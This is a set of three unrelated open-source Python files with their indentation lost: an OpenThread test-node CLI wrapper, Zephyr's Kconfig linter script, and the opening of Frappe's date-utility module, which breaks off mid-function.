def add_whitelist(self, addr, rssi=None):
cmd = 'macfilter addr add %s' % addr
if rssi is not None:
cmd += ' %s' % rssi
self.send_command(cmd)
self._expect('Done')
def remove_whitelist(self, addr):
cmd = 'macfilter addr remove %s' % addr
self.send_command(cmd)
self._expect('Done')
def get_addr16(self):
self.send_command('rloc16')
i = self._expect('([0-9a-fA-F]{4})')
if i == 0:
addr16 = int(self.pexpect.match.groups()[0], 16)
self._expect('Done')
return addr16
def get_router_id(self):
rloc16 = self.get_addr16()
return rloc16 >> 10
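# Illustrative: the router ID is carried in the top 6 bits of the 16-bit
# RLOC16, so shifting right by 10 recovers it, e.g. 0x5400 >> 10 == 21.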
def get_addr64(self):
self.send_command('extaddr')
i = self._expect('([0-9a-fA-F]{16})')
if i == 0:
addr64 = self.pexpect.match.groups()[0].decode("utf-8")
self._expect('Done')
return addr64
def get_eui64(self):
self.send_command('eui64')
i = self._expect('([0-9a-fA-F]{16})')
if i == 0:
addr64 = self.pexpect.match.groups()[0].decode("utf-8")
self._expect('Done')
return addr64
def get_joiner_id(self):
self.send_command('joiner id')
i = self._expect('([0-9a-fA-F]{16})')
if i == 0:
addr = self.pexpect.match.groups()[0].decode("utf-8")
self._expect('Done')
return addr
def get_channel(self):
self.send_command('channel')
i = self._expect(r'(\d+)\r?\n')
if i == 0:
channel = int(self.pexpect.match.groups()[0])
self._expect('Done')
return channel
def set_channel(self, channel):
cmd = 'channel %d' % channel
self.send_command(cmd)
self._expect('Done')
def get_masterkey(self):
self.send_command('masterkey')
i = self._expect('([0-9a-fA-F]{32})')
if i == 0:
masterkey = self.pexpect.match.groups()[0].decode("utf-8")
self._expect('Done')
return masterkey
def set_masterkey(self, masterkey):
cmd = 'masterkey %s' % masterkey
self.send_command(cmd)
self._expect('Done')
def get_key_sequence_counter(self):
self.send_command('keysequence counter')
i = self._expect(r'(\d+)\r?\n')
if i == 0:
key_sequence_counter = int(self.pexpect.match.groups()[0])
self._expect('Done')
return key_sequence_counter
def set_key_sequence_counter(self, key_sequence_counter):
cmd = 'keysequence counter %d' % key_sequence_counter
self.send_command(cmd)
self._expect('Done')
def set_key_switch_guardtime(self, key_switch_guardtime):
cmd = 'keysequence guardtime %d' % key_switch_guardtime
self.send_command(cmd)
self._expect('Done')
def set_network_id_timeout(self, network_id_timeout):
cmd = 'networkidtimeout %d' % network_id_timeout
self.send_command(cmd)
self._expect('Done')
def get_network_name(self):
self.send_command('networkname')
while True:
i = self._expect(['Done', r'(\S+)'])
if i != 0:
network_name = self.pexpect.match.groups()[0].decode('utf-8')
else:
break
return network_name
def set_network_name(self, network_name):
cmd = 'networkname %s' % network_name
self.send_command(cmd)
self._expect('Done')
def get_panid(self):
self.send_command('panid')
i = self._expect('([0-9a-fA-F]{4})')
if i == 0:
panid = int(self.pexpect.match.groups()[0], 16)
self._expect('Done')
return panid
def set_panid(self, panid=config.PANID):
cmd = 'panid %d' % panid
self.send_command(cmd)
self._expect('Done')
def get_partition_id(self):
self.send_command('leaderpartitionid')
i = self._expect(r'(\d+)\r?\n')
if i == 0:
partition_id = self.pexpect.match.groups()[0]
self._expect('Done')
return partition_id
def set_partition_id(self, partition_id):
cmd = 'leaderpartitionid %d' % partition_id
self.send_command(cmd)
self._expect('Done')
def set_router_upgrade_threshold(self, threshold):
cmd = 'routerupgradethreshold %d' % threshold
self.send_command(cmd)
self._expect('Done')
def set_router_downgrade_threshold(self, threshold):
cmd = 'routerdowngradethreshold %d' % threshold
self.send_command(cmd)
self._expect('Done')
def release_router_id(self, router_id):
cmd = 'releaserouterid %d' % router_id
self.send_command(cmd)
self._expect('Done')
def get_state(self):
states = [r'\ndetached', r'\nchild', r'\nrouter', r'\nleader']
self.send_command('state')
match = self._expect(states)
self._expect('Done')
return states[match].strip(r'\n')
def set_state(self, state):
cmd = 'state %s' % state
self.send_command(cmd)
self._expect('Done')
def get_timeout(self):
self.send_command('childtimeout')
i = self._expect(r'(\d+)\r?\n')
if i == 0:
timeout = self.pexpect.match.groups()[0]
self._expect('Done')
return timeout
def set_timeout(self, timeout):
cmd = 'childtimeout %d' % timeout
self.send_command(cmd)
self._expect('Done')
def set_max_children(self, number):
cmd = 'childmax %d' % number
self.send_command(cmd)
self._expect('Done')
def get_weight(self):
self.send_command('leaderweight')
i = self._expect(r'(\d+)\r?\n')
if i == 0:
weight = self.pexpect.match.groups()[0]
self._expect('Done')
return weight
def set_weight(self, weight):
cmd = 'leaderweight %d' % weight
self.send_command(cmd)
self._expect('Done')
def add_ipaddr(self, ipaddr):
cmd = 'ipaddr add %s' % ipaddr
self.send_command(cmd)
self._expect('Done')
def get_addrs(self):
addrs = []
self.send_command('ipaddr')
while True:
i = self._expect([r'(\S+(:\S*)+)\r?\n', 'Done'])
if i == 0:
addrs.append(self.pexpect.match.groups()[0].decode("utf-8"))
elif i == 1:
break
return addrs
def get_addr(self, prefix):
network = ipaddress.ip_network(u'%s' % str(prefix))
addrs = self.get_addrs()
for addr in addrs:
if isinstance(addr, bytearray):
addr = bytes(addr)
elif isinstance(addr, str) and sys.version_info[0] == 2:
addr = addr.decode("utf-8")
ipv6_address = ipaddress.ip_address(addr)
if ipv6_address in network:
return ipv6_address.exploded
return None
def get_addr_rloc(self):
addrs = self.get_addrs()
for addr in addrs:
segs = addr.split(':')
if (
segs[4] == '0'
and segs[5] == 'ff'
and segs[6] == 'fe00'
and segs[7] != 'fc00'
):
return addr
return None
def get_addr_leader_aloc(self):
addrs = self.get_addrs()
for addr in addrs:
segs = addr.split(':')
if (
segs[4] == '0'
and segs[5] == 'ff'
and segs[6] == 'fe00'
and segs[7] == 'fc00'
):
return addr
return None
def get_eidcaches(self):
eidcaches = []
self.send_command('eidcache')
while True:
i = self._expect([r'([a-fA-F0-9\:]+) ([a-fA-F0-9]+)\r?\n', 'Done'])
if i == 0:
eid = self.pexpect.match.groups()[0].decode("utf-8")
rloc = self.pexpect.match.groups()[1].decode("utf-8")
eidcaches.append((eid, rloc))
elif i == 1:
break
return eidcaches
def add_service(self, enterpriseNumber, serviceData, serverData):
cmd = 'service add %s %s %s' % (
enterpriseNumber,
serviceData,
serverData,
)
self.send_command(cmd)
self._expect('Done')
def remove_service(self, enterpriseNumber, serviceData):
cmd = 'service remove %s %s' % (enterpriseNumber, serviceData)
self.send_command(cmd)
self._expect('Done')
def __getLinkLocalAddress(self):
for ip6Addr in self.get_addrs():
if re.match(config.LINK_LOCAL_REGEX_PATTERN, ip6Addr, re.I):
return ip6Addr
return None
def __getGlobalAddress(self):
global_address = []
for ip6Addr in self.get_addrs():
if (
(not re.match(config.LINK_LOCAL_REGEX_PATTERN, ip6Addr, re.I))
and (
not re.match(
config.MESH_LOCAL_PREFIX_REGEX_PATTERN, ip6Addr, re.I
)
)
and (
not re.match(
config.ROUTING_LOCATOR_REGEX_PATTERN, ip6Addr, re.I
)
)
):
global_address.append(ip6Addr)
return global_address
def __getRloc(self):
for ip6Addr in self.get_addrs():
if (
re.match(config.MESH_LOCAL_PREFIX_REGEX_PATTERN, ip6Addr, re.I)
and re.match(
config.ROUTING_LOCATOR_REGEX_PATTERN, ip6Addr, re.I
)
and not (
re.match(config.ALOC_FLAG_REGEX_PATTERN, ip6Addr, re.I)
)
):
return ip6Addr
return None
def __getAloc(self):
aloc = []
for ip6Addr in self.get_addrs():
if (
re.match(config.MESH_LOCAL_PREFIX_REGEX_PATTERN, ip6Addr, re.I)
and re.match(
config.ROUTING_LOCATOR_REGEX_PATTERN, ip6Addr, re.I
)
and re.match(config.ALOC_FLAG_REGEX_PATTERN, ip6Addr, re.I)
):
aloc.append(ip6Addr)
return aloc
def __getMleid(self):
for ip6Addr in self.get_addrs():
if re.match(
config.MESH_LOCAL_PREFIX_REGEX_PATTERN, ip6Addr, re.I
) and not (
re.match(config.ROUTING_LOCATOR_REGEX_PATTERN, ip6Addr, re.I)
):
return ip6Addr
return None
def get_ip6_address(self, address_type):
"""Get specific type of IPv6 address configured on thread device.
Args:
address_type: the config.ADDRESS_TYPE type of IPv6 address.
Returns:
IPv6 address string.
"""
if address_type == config.ADDRESS_TYPE.LINK_LOCAL:
return self.__getLinkLocalAddress()
elif address_type == config.ADDRESS_TYPE.GLOBAL:
return self.__getGlobalAddress()
elif address_type == config.ADDRESS_TYPE.RLOC:
return self.__getRloc()
elif address_type == config.ADDRESS_TYPE.ALOC:
return self.__getAloc()
elif address_type == config.ADDRESS_TYPE.ML_EID:
return self.__getMleid()
else:
return None
def get_context_reuse_delay(self):
self.send_command('contextreusedelay')
i = self._expect(r'(\d+)\r?\n')
if i == 0:
timeout = self.pexpect.match.groups()[0]
self._expect('Done')
return timeout
def set_context_reuse_delay(self, delay):
cmd = 'contextreusedelay %d' % delay
self.send_command(cmd)
self._expect('Done')
def add_prefix(self, prefix, flags, prf='med'):
cmd = 'prefix add %s %s %s' % (prefix, flags, prf)
self.send_command(cmd)
self._expect('Done')
def remove_prefix(self, prefix):
cmd = 'prefix remove %s' % prefix
self.send_command(cmd)
self._expect('Done')
def add_route(self, prefix, prf='med'):
cmd = 'route add %s %s' % (prefix, prf)
self.send_command(cmd)
self._expect('Done')
def remove_route(self, prefix):
cmd = 'route remove %s' % prefix
self.send_command(cmd)
self._expect('Done')
def register_netdata(self):
self.send_command('netdataregister')
self._expect('Done')
def energy_scan(self, mask, count, period, scan_duration, ipaddr):
cmd = 'commissioner energy %d %d %d %d %s' % (
mask,
count,
period,
scan_duration,
ipaddr,
)
self.send_command(cmd)
if isinstance(self.simulator, simulator.VirtualTime):
self.simulator.go(8)
timeout = 1
else:
timeout = 8
self._expect('Energy:', timeout=timeout)
def panid_query(self, panid, mask, ipaddr):
cmd = 'commissioner panid %d %d %s' % (panid, mask, ipaddr)
self.send_command(cmd)
if isinstance(self.simulator, simulator.VirtualTime):
self.simulator.go(8)
timeout = 1
else:
timeout = 8
self._expect('Conflict:', timeout=timeout)
def scan(self):
self.send_command('scan')
results = []
while True:
i = self._expect(
[
r'\|\s(\S+)\s+\|\s(\S+)\s+\|\s([0-9a-fA-F]{4})\s\|\s([0-9a-fA-F]{16})\s\|\s(\d+)\r?\n',
'Done',
]
)
if i == 0:
results.append(self.pexpect.match.groups())
else:
break
return results
def ping(self, ipaddr, num_responses=1, size=None, timeout=5):
cmd = 'ping %s' % ipaddr
if size is not None:
cmd += ' %d' % size
self.send_command(cmd)
if isinstance(self.simulator, simulator.VirtualTime):
self.simulator.go(timeout)
result = True
try:
responders = {}
while len(responders) < num_responses:
i = self._expect([r'from (\S+):'])
if i == 0:
responders[self.pexpect.match.groups()[0]] = 1
self._expect('\n')
except (pexpect.TIMEOUT, socket.timeout):
result = False
if isinstance(self.simulator, simulator.VirtualTime):
self.simulator.sync_devices()
return result
def reset(self):
self.send_command('reset')
time.sleep(0.1)
def set_router_selection_jitter(self, jitter):
cmd = 'routerselectionjitter %d' % jitter
self.send_command(cmd)
self._expect('Done')
def set_active_dataset(
self,
timestamp,
panid=None,
channel=None,
channel_mask=None,
master_key=None,
):
self.send_command('dataset clear')
self._expect('Done')
cmd = 'dataset activetimestamp %d' % timestamp
self.send_command(cmd)
self._expect('Done')
if panid is not None:
cmd = 'dataset panid %d' % panid
self.send_command(cmd)
self._expect('Done')
if channel is not None:
cmd = 'dataset channel %d' % channel
self.send_command(cmd)
self._expect('Done')
if channel_mask is not None:
cmd = 'dataset channelmask %d' % channel_mask
self.send_command(cmd)
self._expect('Done')
if master_key is not None:
cmd = 'dataset masterkey %s' % master_key
self.send_command(cmd)
self._expect('Done')
self.send_command('dataset commit active')
self._expect('Done')
def set_pending_dataset(
self, pendingtimestamp, activetimestamp, panid=None, channel=None
):
self.send_command('dataset clear')
self._expect('Done')
cmd = 'dataset pendingtimestamp %d' % pendingtimestamp
self.send_command(cmd)
self._expect('Done')
cmd = 'dataset activetimestamp %d' % activetimestamp
self.send_command(cmd)
self._expect('Done')
if panid is not None:
cmd = 'dataset panid %d' % panid
self.send_command(cmd)
self._expect('Done')
if channel is not None:
cmd = 'dataset channel %d' % channel
self.send_command(cmd)
self._expect('Done')
self.send_command('dataset commit pending')
self._expect('Done')
def announce_begin(self, mask, count, period, ipaddr):
cmd = 'commissioner announce %d %d %d %s' % (
mask,
count,
period,
ipaddr,
)
self.send_command(cmd)
self._expect('Done')
def send_mgmt_active_set(
self,
active_timestamp=None,
channel=None,
channel_mask=None,
extended_panid=None,
panid=None,
master_key=None,
mesh_local=None,
network_name=None,
binary=None,
):
cmd = 'dataset mgmtsetcommand active '
if active_timestamp is not None:
cmd += 'activetimestamp %d ' % active_timestamp
if channel is not None:
cmd += 'channel %d ' % channel
if channel_mask is not None:
cmd += 'channelmask %d ' % channel_mask
if extended_panid is not None:
cmd += 'extpanid %s ' % extended_panid
if panid is not None:
cmd += 'panid %d ' % panid
if master_key is not None:
cmd += 'masterkey %s ' % master_key
if mesh_local is not None:
cmd += 'localprefix %s ' % mesh_local
if network_name is not None:
cmd += 'networkname %s ' % network_name
if binary is not None:
cmd += 'binary %s ' % binary
self.send_command(cmd)
self._expect('Done')
def send_mgmt_pending_set(
self,
pending_timestamp=None,
active_timestamp=None,
delay_timer=None,
channel=None,
panid=None,
master_key=None,
mesh_local=None,
network_name=None,
):
cmd = 'dataset mgmtsetcommand pending '
if pending_timestamp is not None:
cmd += 'pendingtimestamp %d ' % pending_timestamp
if active_timestamp is not None:
cmd += 'activetimestamp %d ' % active_timestamp
if delay_timer is not None:
cmd += 'delaytimer %d ' % delay_timer
if channel is not None:
cmd += 'channel %d ' % channel
if panid is not None:
cmd += 'panid %d ' % panid
if master_key is not None:
cmd += 'masterkey %s ' % master_key
if mesh_local is not None:
cmd += 'localprefix %s ' % mesh_local
if network_name is not None:
cmd += 'networkname %s ' % network_name
self.send_command(cmd)
self._expect('Done')
def coaps_start_psk(self, psk, pskIdentity):
cmd = 'coaps psk %s %s' % (psk, pskIdentity)
self.send_command(cmd)
self._expect('Done')
cmd = 'coaps start'
self.send_command(cmd)
self._expect('Done')
def coaps_start_x509(self):
cmd = 'coaps x509'
self.send_command(cmd)
self._expect('Done')
cmd = 'coaps start'
self.send_command(cmd)
self._expect('Done')
def coaps_set_resource_path(self, path):
cmd = 'coaps resource %s' % path
self.send_command(cmd)
self._expect('Done')
def coaps_stop(self):
cmd = 'coaps stop'
self.send_command(cmd)
if isinstance(self.simulator, simulator.VirtualTime):
self.simulator.go(5)
timeout = 1
else:
timeout = 5
self._expect('Done', timeout=timeout)
def coaps_connect(self, ipaddr):
cmd = 'coaps connect %s' % ipaddr
self.send_command(cmd)
if isinstance(self.simulator, simulator.VirtualTime):
self.simulator.go(5)
timeout = 1
else:
timeout = 5
self._expect('coaps connected', timeout=timeout)
def coaps_disconnect(self):
cmd = 'coaps disconnect'
self.send_command(cmd)
self._expect('Done')
self.simulator.go(5)
def coaps_get(self):
cmd = 'coaps get test'
self.send_command(cmd)
if isinstance(self.simulator, simulator.VirtualTime):
self.simulator.go(5)
timeout = 1
else:
timeout = 5
self._expect('coaps response', timeout=timeout)
def commissioner_mgmtset(self, tlvs_binary):
cmd = 'commissioner mgmtset binary %s' % tlvs_binary
self.send_command(cmd)
self._expect('Done')
def bytes_to_hex_str(self, src):
return ''.join(format(x, '02x') for x in src)
def commissioner_mgmtset_with_tlvs(self, tlvs):
payload = bytearray()
for tlv in tlvs:
payload += tlv.to_hex()
self.commissioner_mgmtset(self.bytes_to_hex_str(payload))
def udp_start(self, local_ipaddr, local_port):
cmd = 'udp open'
self.send_command(cmd)
self._expect('Done')
cmd = 'udp bind %s %s' % (local_ipaddr, local_port)
self.send_command(cmd)
self._expect('Done')
def udp_stop(self):
cmd = 'udp close'
self.send_command(cmd)
self._expect('Done')
def udp_send(self, bytes, ipaddr, port, success=True):
cmd = 'udp send -s %d %s %d' % (bytes, ipaddr, port)
self.send_command(cmd)
if success:
self._expect('Done')
else:
self._expect('Error')
def udp_check_rx(self, bytes_should_rx):
self._expect('%d bytes' % bytes_should_rx)
if __name__ == '__main__':
unittest.main()
|
|
#!/usr/bin/env python3
# Copyright (c) 2019 Nordic Semiconductor ASA
# SPDX-License-Identifier: Apache-2.0
"""
Linter for the Zephyr Kconfig files. Pass --help to see
available checks. By default, all checks are enabled.
Some of the checks rely on heuristics and can get tripped up
by things like preprocessor magic, so manual checking is
still needed. 'git grep' is handy.
Requires west, because the checks need to see Kconfig files
and source code from modules.
"""
import argparse
import os
import re
import shlex
import subprocess
import sys
import tempfile
TOP_DIR = os.path.join(os.path.dirname(__file__), "..", "..")
sys.path.insert(0, os.path.join(TOP_DIR, "scripts", "kconfig"))
import kconfiglib
def main():
init_kconfig()
args = parse_args()
if args.checks:
checks = args.checks
else:
# Run all checks if no checks were specified
checks = (check_always_n,
check_unused,
check_pointless_menuconfigs,
check_defconfig_only_definition,
check_missing_config_prefix)
first = True
for check in checks:
if not first:
print()
first = False
check()
def parse_args():
# args.checks is set to a list of check functions to run
parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter,
description=__doc__)
parser.add_argument(
"-n", "--check-always-n",
action="append_const", dest="checks", const=check_always_n,
help="""\
List symbols that can never be anything but n/empty. These
are detected as symbols with no prompt or defaults that
aren't selected or implied.
""")
parser.add_argument(
"-u", "--check-unused",
action="append_const", dest="checks", const=check_unused,
help="""\
List symbols that might be unused.
Heuristic:
- Isn't referenced in Kconfig
- Isn't referenced as CONFIG_<NAME> outside Kconfig
(besides possibly as CONFIG_<NAME>=<VALUE>)
- Isn't selecting/implying other symbols
- Isn't a choice symbol
C preprocessor magic can trip up this check.""")
parser.add_argument(
"-m", "--check-pointless-menuconfigs",
action="append_const", dest="checks", const=check_pointless_menuconfigs,
help="""\
List symbols defined with 'menuconfig' where the menu is
empty due to the symbol not being followed by stuff that
depends on it""")
parser.add_argument(
"-d", "--check-defconfig-only-definition",
action="append_const", dest="checks", const=check_defconfig_only_definition,
help="""\
List symbols that are only defined in Kconfig.defconfig
files. A common base definition should probably be added
somewhere for such symbols, and the type declaration ('int',
'hex', etc.) removed from Kconfig.defconfig.""")
parser.add_argument(
"-p", "--check-missing-config-prefix",
action="append_const", dest="checks", const=check_missing_config_prefix,
help="""\
Look for references like
#if MACRO
#if(n)def MACRO
defined(MACRO)
IS_ENABLED(MACRO)
where MACRO is the name of a defined Kconfig symbol but
doesn't have a CONFIG_ prefix. Could be a typo.
Macros that are #define'd somewhere are not flagged.""")
return parser.parse_args()
def check_always_n():
print_header("Symbols that can't be anything but n/empty")
for sym in kconf.unique_defined_syms:
if not has_prompt(sym) and not is_selected_or_implied(sym) and \
not has_defaults(sym):
print(name_and_locs(sym))
def check_unused():
print_header("Symbols that look unused")
referenced = referenced_sym_names()
for sym in kconf.unique_defined_syms:
if not is_selecting_or_implying(sym) and not sym.choice and \
sym.name not in referenced:
print(name_and_locs(sym))
def check_pointless_menuconfigs():
print_header("menuconfig symbols with empty menus")
for node in kconf.node_iter():
if node.is_menuconfig and not node.list and \
isinstance(node.item, kconfiglib.Symbol):
print("{0.item.name:40} {0.filename}:{0.linenr}".format(node))
def check_defconfig_only_definition():
print_header("Symbols only defined in Kconfig.defconfig files")
for sym in kconf.unique_defined_syms:
if all("defconfig" in node.filename for node in sym.nodes):
print(name_and_locs(sym))
def check_missing_config_prefix():
print_header("Symbol references that might be missing a CONFIG_ prefix")
# Paths to modules
modpaths = run(("west", "list", "-f{abspath}")).splitlines()
# Gather #define'd macros that might overlap with symbol names, so that
# they don't trigger false positives
defined = set()
for modpath in modpaths:
regex = r"#\s*define\s+([A-Z0-9_]+)\b"
defines = run(("git", "grep", "--extended-regexp", regex),
cwd=modpath, check=False)
# Could pass --only-matching to git grep as well, but it was added
# pretty recently (2018)
defined.update(re.findall(regex, defines))
# Filter out symbols whose names are #define'd too. Preserve definition
# order to make the output consistent.
syms = [sym for sym in kconf.unique_defined_syms
if sym.name not in defined]
# grep for symbol references in #ifdef/defined() that are missing a CONFIG_
# prefix. Work around an "argument list too long" error from 'git grep' by
# checking symbols in batches.
for batch in split_list(syms, 200):
# grep for '#if((n)def) <symbol>', 'defined(<symbol>', and
# 'IS_ENABLED(<symbol>', with a missing CONFIG_ prefix
regex = r"(?:#\s*if(?:n?def)\s+|\bdefined\s*\(\s*|IS_ENABLED\(\s*)(?:" + \
"|".join(sym.name for sym in batch) + r")\b"
cmd = ("git", "grep", "--line-number", "-I", "--perl-regexp", regex)
for modpath in modpaths:
print(run(cmd, cwd=modpath, check=False), end="")
def split_list(lst, batch_size):
# check_missing_config_prefix() helper generator that splits a list into
# equal-sized batches (possibly with a shorter batch at the end)
for i in range(0, len(lst), batch_size):
yield lst[i:i + batch_size]
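# Illustrative: split_list([1, 2, 3, 4, 5], 2) yields [1, 2], [3, 4], [5].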
def print_header(s):
print(s + "\n" + len(s)*"=")
def init_kconfig():
global kconf
os.environ.update(
srctree=TOP_DIR,
CMAKE_BINARY_DIR=modules_file_dir(),
KCONFIG_DOC_MODE="1",
ZEPHYR_BASE=TOP_DIR,
SOC_DIR="soc",
ARCH_DIR="arch",
BOARD_DIR="boards/*/*",
ARCH="*")
kconf = kconfiglib.Kconfig(suppress_traceback=True)
def modules_file_dir():
# Creates Kconfig.modules in a temporary directory and returns the path to
# the directory. Kconfig.modules brings in Kconfig files from modules.
tmpdir = tempfile.mkdtemp()
run((os.path.join("scripts", "zephyr_module.py"),
"--kconfig-out", os.path.join(tmpdir, "Kconfig.modules")))
return tmpdir
def referenced_sym_names():
# Returns the names of all symbols referenced inside and outside the
# Kconfig files (that we can detect), without any "CONFIG_" prefix
return referenced_in_kconfig() | referenced_outside_kconfig()
def referenced_in_kconfig():
# Returns the names of all symbols referenced inside the Kconfig files
return {ref.name
for node in kconf.node_iter()
for ref in node.referenced
if isinstance(ref, kconfiglib.Symbol)}
def referenced_outside_kconfig():
# Returns the names of all symbols referenced outside the Kconfig files
regex = r"\bCONFIG_[A-Z0-9_]+\b"
res = set()
# 'git grep' all modules
for modpath in run(("west", "list", "-f{abspath}")).splitlines():
for line in run(("git", "grep", "-h", "-I", "--extended-regexp", regex),
cwd=modpath).splitlines():
# Don't record lines starting with "CONFIG_FOO=" or "# CONFIG_FOO="
# as references, so that symbols that are only assigned in .config
# files are not included
if re.match(r"[\s#]*CONFIG_[A-Z0-9_]+=.*", line):
continue
# Could pass --only-matching to git grep as well, but it was added
# pretty recently (2018)
for match in re.findall(regex, line):
res.add(match[7:]) # Strip "CONFIG_"
return res
def has_prompt(sym):
return any(node.prompt for node in sym.nodes)
def is_selected_or_implied(sym):
return sym.rev_dep is not kconf.n or sym.weak_rev_dep is not kconf.n
def has_defaults(sym):
return bool(sym.defaults)
def is_selecting_or_implying(sym):
return sym.selects or sym.implies
def name_and_locs(sym):
# Returns a string with the name and definition location(s) for 'sym'
return "{:40} {}".format(
sym.name,
", ".join("{0.filename}:{0.linenr}".format(node) for node in sym.nodes))
def run(cmd, cwd=TOP_DIR, check=True):
# Runs 'cmd' with subprocess, returning the decoded stdout output. 'cwd' is
# the working directory. It defaults to the top-level Zephyr directory.
# Exits with an error if the command exits with a non-zero return code if
# 'check' is True.
cmd_s = " ".join(shlex.quote(word) for word in cmd)
try:
process = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=cwd)
except OSError as e:
err("Failed to run '{}': {}".format(cmd_s, e))
stdout, stderr = process.communicate()
# errors="ignore" temporarily works around
# https://github.com/zephyrproject-rtos/esp-idf/pull/2
stdout = stdout.decode("utf-8", errors="ignore")
stderr = stderr.decode("utf-8")
if check and process.returncode:
err("""\
'{}' exited with status {}.
===stdout===
{}
===stderr===
{}""".format(cmd_s, process.returncode, stdout, stderr))
if stderr:
warn("'{}' wrote to stderr:\n{}".format(cmd_s, stderr))
return stdout
def err(msg):
sys.exit(executable() + "error: " + msg)
def warn(msg):
print(executable() + "warning: " + msg, file=sys.stderr)
def executable():
cmd = sys.argv[0] # Empty string if missing
return cmd + ": " if cmd else ""
if __name__ == "__main__":
main()
|
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
# IMPORTANT: only import safe functions as this module will be included in jinja environment
import frappe
import operator
import re, urllib, datetime, math
import babel.dates
from dateutil import parser
from num2words import num2words
import HTMLParser
from html2text import html2text
DATE_FORMAT = "%Y-%m-%d"
TIME_FORMAT = "%H:%M:%S.%f"
DATETIME_FORMAT = DATE_FORMAT + " " + TIME_FORMAT
# datetime functions
def getdate(string_date=None):
"""
Converts a string date (yyyy-mm-dd) to a datetime.date object
"""
if not string_date:
return get_datetime().date()
if isinstance(string_date, datetime.datetime):
return string_date.date()
elif isinstance(string_date, datetime.date):
return string_date
# dateutil parser does not agree with dates like 0000-00-00
if not string_date or string_date=="0000-00-00":
return None
return parser.parse(string_date).date()
def get_datetime(datetime_str=None):
if not datetime_str:
return now_datetime()
if isinstance(datetime_str, (datetime.datetime, datetime.timedelta)):
return datetime_str
elif isinstance(datetime_str, (list, tuple)):
return datetime.datetime(*datetime_str)
elif isinstance(datetime_str, datetime.date):
return datetime.datetime.combine(datetime_str, datetime.time())
# dateutil parser does not agree with dates like 0000-00-00
if not datetime_str or (datetime_str or "").startswith("0000-00-00"):
return None
return parser.parse(datetime_str)
def to_timedelta(time_str):
if isinstance(time_str, basestring):
t = parser.parse(time_str)
return datetime.timedelta(hours=t.hour, minutes=t.minute, seconds=t.second, microseconds=t.microsecond)
else:
return time_str
def add_to_date(date, years=0, months=0, days=0):
"""Adds `days` to the given date"""
from dateutil.relativedelta import relativedelta
as_string, as_datetime = False, False
if isinstance(date, basestring):
as_string = True
if " " in date:
as_datetime = True
date = parser.parse(date)
date = date + relativedelta(years=years, months=months, days=days)
if as_string:
if as_datetime:
return date.strftime(DATETIME_FORMAT)
else:
return date.strftime(DATE_FORMAT)
else:
return date
def add_days(date, days):
return add_to_date(date, days=days)
def add_months(date, months):
return add_to_date(date, months=months)
def add_years(date, years):
return add_to_date(date, years=years)
def date_diff(string_ed_date, string_st_date):
return (getdate(string_ed_date) - getdate(string_st_date)).days
def time_diff(string_ed_date, string_st_date):
return get_datetime(string_ed_date) - get_datetime(string_st_date)
def time_diff_in_seconds(string_ed_date, string_st_date):
return time_diff(string_ed_date, string_st_date).total_seconds()
def time_diff_in_hours(string_ed_date, string_st_date):
return round(float(time_diff(string_ed_date, string_st_date).total_seconds()) / 3600, 6)
def now_datetime():
dt = convert_utc_to_user_timezone(datetime.datetime.utcnow())
return dt.replace(tzinfo=None)
def _get_time_zone():
return frappe.db.get_system_setting('time_zone') or 'Asia/Kolkata'
def get_time_zone():
if frappe.local.flags.in_test:
return _get_time_zone()
return frappe.cache().get_value("time_zone", _get_time_zone)
def convert_utc_to_user_timezone(utc_timestamp):
from pytz import timezone, UnknownTimeZoneError
utcnow = timezone('UTC').localize(utc_timestamp)
try:
return utcnow.astimezone(timezone(get_time_zone()))
except UnknownTimeZoneError:
return utcnow
def now():
"""return current datetime as yyyy-mm-dd hh:mm:ss"""
if getattr(frappe.local, "current_date", None):
return getdate(frappe.local.current_date).strftime(DATE_FORMAT) + " " + \
now_datetime().strftime(TIME_FORMAT)
else:
return now_datetime().strftime(DATETIME_FORMAT)
def nowdate():
"""return current date as yyyy-mm-dd"""
return now_datetime().strftime(DATE_FORMAT)
def today():
return nowdate()
def nowtime():
"""return current time in hh:mm"""
return now_datetime().strftime(TIME_FORMAT)
def get_first_day(dt, d_years=0, d_months=0):
"""
Returns the first day of the month for the date specified by date object
Also adds `d_years` and `d_months` if specified
"""
dt = getdate(dt)
# d_years, d_months are "deltas" to apply to dt
overflow_years, month = divmod(dt.month + d_months - 1, 12)
year = dt.year + d_years + overflow_years
return datetime.date(year, month + 1, 1)
def get_last_day(dt):
"""
Returns last day of the month using:
`get_first_day(dt, 0, 1) + datetime.timedelta(-1)`
"""
return get_first_day(dt, 0, 1) + datetime.timedelta(-1)
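# Illustrative: get_first_day(datetime.date(2020, 11, 15), d_months=3) gives
# datetime.date(2021, 2, 1); get_last_day(datetime.date(2020, 2, 10)) gives
# datetime.date(2020, 2, 29).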
def get_time(time_str):
if isinstance(time_str, datetime.datetime):
return time_str.time()
elif isinstance(time_str, datetime.time):
return time_str
return parser.parse(time_str).time()
def get_datetime_str(datetime_obj):
if isinstance(datetime_obj, basestring):
datetime_obj = get_datetime(datetime_obj)
return datetime_obj.strftime(DATETIME_FORMAT)
def get_user_format():
if getattr(frappe.local, "user_format", None) is None:
frappe.local.user_format = frappe.db.get_default("date_format")
return frappe.local.user_format or "yyyy-mm-dd"
def formatdate(string_date=None, format_string=None):
"""
Converts the given string date to :data:`user_format`
User format specified in defaults
Examples:
* dd-mm-yyyy
* mm-dd-yyyy
* dd/mm/yyyy
"""
date = getdate(string_date) if string_date else now_datetime().date()
if not format_string:
format_string = get_user_format().replace("mm", "MM")
return babel.dates.format_date(date, format_string, locale=(frappe.local.lang or "").replace("-", "_"))
def format_time(txt):
return babel.dates.format_time(get_time(txt), locale=(frappe.local.lang or "").replace("-", "_"))
def format_datetime(datetime_string, format_string=None):
if not datetime_string:
return
datetime = get_datetime(datetime_string)
if not format_string:
format_string = get_user_format().replace("mm", "MM") + " HH:mm:ss"
return babel.dates.format_datetime(datetime, format_string, locale=(frappe.local.lang or "").replace("-", "_"))
def global_date_format(date):
"""returns date as 1 January 2012"""
formatted_date = getdate(date).strftime("%d %B %Y")
return formatted_date.startswith("0") and formatted_date[1:] or formatted_date
def has_common(l1, l2):
"""Returns truthy value if there are common elements in lists l1 and l2"""
return set(l1) & set(l2)
def flt(s, precision=None):
"""Convert to float (ignore commas)"""
if isinstance(s, basestring):
s = s.replace(',','')
try:
num = float(s)
if precision is not None:
num = rounded(num, precision)
